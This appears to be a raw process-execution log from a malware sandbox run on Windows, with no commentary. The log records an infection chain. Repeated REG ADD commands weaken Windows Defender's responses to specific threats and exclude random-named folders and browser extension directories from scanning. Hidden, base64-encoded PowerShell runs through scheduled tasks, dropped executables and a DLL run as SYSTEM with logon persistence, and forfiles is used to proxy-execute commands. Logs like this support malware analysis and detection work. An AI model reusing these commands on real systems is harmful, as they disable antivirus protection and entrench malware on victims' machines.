forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBNVCDjWJ" /SC once /ST 01:28:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBNVCDjWJ"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBNVCDjWJ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:15:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe\" y7 /tRofdidjO 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "WKALCIrwIEiqhKBsn"

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe y7 /tRofdidjO 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 232 -ip 232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 1052

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\xwzecB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

